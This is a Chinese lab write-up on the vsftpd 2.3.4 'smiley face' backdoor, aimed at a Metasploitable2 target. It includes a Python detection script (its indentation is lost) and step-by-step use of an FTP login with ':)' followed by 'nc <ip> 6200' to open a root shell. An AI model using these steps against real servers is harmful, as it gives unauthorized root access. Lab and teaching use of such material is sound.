Python腳本檢測笑臉漏洞的問題復現(xiàn)
Python腳本檢測笑臉漏洞
一、漏洞介紹
? vsftpd2.3.4中在6200端口存在一個shell,使得任何人都可以進行連接,并且VSFTPD v2.3.4 服務,是以 root 權限運行的,最終我們提到的權限也是root;當連接帶有vsftpd 2.3.4版本的服務器的21端口時,輸入用戶中帶有“?? ”,密碼任意,因此也稱為笑臉漏洞。
二、環(huán)境搭建
攻擊機(本機):125.217.53.182
靶機(metaspolit2):192.168.126.129
namp漏洞掃描


我們發(fā)現(xiàn)21端口是打開的,而且版本也相對應,接下來我們使用python腳本進行漏洞檢測
import socket
from ftplib import FTP
url = input("請輸入你需要檢測的地址:")
ftp = FTP()
username = 'root:)' #用戶名必須包含:)這兩個字符
password = 'anonymous' #密碼隨便啥都行
try:
ftp.connect(url,21,timeout=10)#使用ftp登錄,設置延時10秒
ftp.login(username,password)
ftp.quit()
except:
print("完成登錄檢測")
try:
s = socket.socket() #使用socket函數(shù)來檢測是否有漏洞存在
s.connect((url,6200))
s.close()
print("存在微笑漏洞")
except:
print("沒有發(fā)現(xiàn)笑臉漏洞!")輸入我們需要攻擊的ip地址,

發(fā)現(xiàn)存在笑臉漏洞
三、漏洞復現(xiàn)
(一)使用nc進行漏洞利用
1、打開命令行登錄ftp服務器,在用戶名處輸入xiaofeng:)然后隨意輸入一個密碼回車等待,緊接著進行下一步:

2、打開一個新窗口,輸入nc 目標ip 6200 即可連接。


復現(xiàn)完成
到此這篇關于Python腳本檢測笑臉漏洞的文章就介紹到這了,更多相關Python腳本檢測笑臉漏洞內容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關文章希望大家以后多多支持腳本之家!
相關文章
pyspark 讀取csv文件創(chuàng)建DataFrame的兩種方法
今天小編就為大家分享一篇pyspark 讀取csv文件創(chuàng)建DataFrame的兩種方法,具有很好的參考價值,希望對大家有所幫助。一起跟隨小編過來看看吧2018-06-06
Python數(shù)據(jù)可視化編程通過Matplotlib創(chuàng)建散點圖代碼示例
這篇文章主要介紹了Python數(shù)據(jù)可視化編程通過Matplotlib創(chuàng)建散點圖實例,具有一定借鑒價值,需要的朋友可以參考下。2017-12-12
python實現(xiàn)在函數(shù)中修改變量值的方法
今天小編就為大家分享一篇python實現(xiàn)在函數(shù)中修改變量值的方法,具有很好的參考價值,希望對大家有所幫助。一起跟隨小編過來看看吧2019-07-07

